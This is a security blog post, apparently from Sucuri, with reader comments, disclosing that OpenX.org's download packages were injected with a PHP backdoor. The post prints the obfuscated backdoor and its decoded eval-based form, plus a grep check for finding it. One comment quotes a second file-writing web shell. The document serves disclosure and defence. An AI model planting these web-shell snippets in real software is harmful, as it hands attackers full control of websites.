OpenX.org Compromised and Downloads Injected with a Backdoor

We received reports that OpenX.org was compromised and the OpenX download files had a backdoor injected in them. According to Heise (in German), the malicious files were modified around November/2012, and have been undetected since.

It means that if you have downloaded OpenX during the last 7 months, it likely contains a backdoor that could allow the attackers full access to your site. That’s how serious it is.

*The OpenX team have confirmed the breach and removed the bad files from their servers.

OpenX Backdoor

We didn’t get access to the infected package yet, but based on some public sources, the backdoor is hidden inside:

/plugins/deliveryLog/vastServeVideoPlayer/flowplayer/3.1.1/flowplayer-3.1.1.min.js

It can be found by searching for PHP tags inside .js files.

This is what the backdoor looks like:

this.each(function(){l=flashembed(this,k,j)}<?php /*if(e)
{jQuery.tools=jQuery.tools||{version:
{}};jQuery.tools.version.flashembed='1.0.2'; 
*/$j='ex'./**/'plode'; /* if(this.className ...

If you look close you can see the PHP code mingled with the JavaScript code, which is meant to make it harder to detect.

After decoding it looks like this:

<?php
$j='explode';
$_=$j(",",'strrev,str_rot13,vastPlayer');
eval ( $_[1]($_[0]( $_POST[$_[2]])) );

This allows the attackers to execute any PHP code via the “eval” function.

Here is a simple command to find if your OpenX install has the backdoor:

$ grep -r --include "*.js" '<?php' DIRECTORYWHEREYOURSITEIS

Our team is still investigating the issue, and we will provide more details soon.

Scan your website for free:
About Daniel Cid

Sucuri CTO, OSSEC Founder, open source developer and information security professional - dcid.me

  • The_Magic_M

    Attacker then puts lots of files with code like this:

    ?php if (sha1($_REQUEST[z]) == ‘[REDACTED]‘){@file_put_contents(stripslashes($_REQUEST[e]),stripslashes($_REQUEST[t]));die(md5(‘md5′));}

    on the server (often replacing “file_put_contents” with “system” or “call_user_func” etc.), plus a couple of more complex backdoors containing obfuscated PHP code.

    Best way to check installation is to run a diff versus a clean download of the same version.

  • The_Magic_M

    Files found not present in default installation containing obfuscated code:

    plugins/api/api.php
    var/cache/minify_8faf80e_mergedDeliveryFunctions.php
    www/admin/plugins/oxMarket/market-settings.php
    www/images/layerstyles/geocities/geocities.php

  • Ignacio Colautti

    Is there a way of fixing this ?

    • The_Magic_M

      OpenX.org has a fixed version, 2.8.11, out.

    • The_Magic_M

      OpenX has version 2.8.11 out which fixes the problem. See their website.

  • The_Magic_M

    Also, when compromised, look in the “banners” table of your OpenX database for cases where
    prepend != ”
    or more precisely
    prepend LIKE ‘%iframe%’
    This will typically show Javascript code trying to exploit client vulnerabilities. Attacker seems to overwrite all contents of all “prepend” fields with the same JS code.

  • http://www.kizi-2.net/ kizi 2

    Is that a form of the virus. How would its effects

    • The_Magic_M

      Read my postings below.
      Main focus seemed to be to deliver malware with the ads delivered, though attacker might use his own backdoors for further malicious activities later if system isn’t patched.

  • Linces Marques

    No, no solution until now. Today 24/09/2013, the version is Openx 2.8.11. And this problem still there.

    Is a shame, the “paid” version has this problem?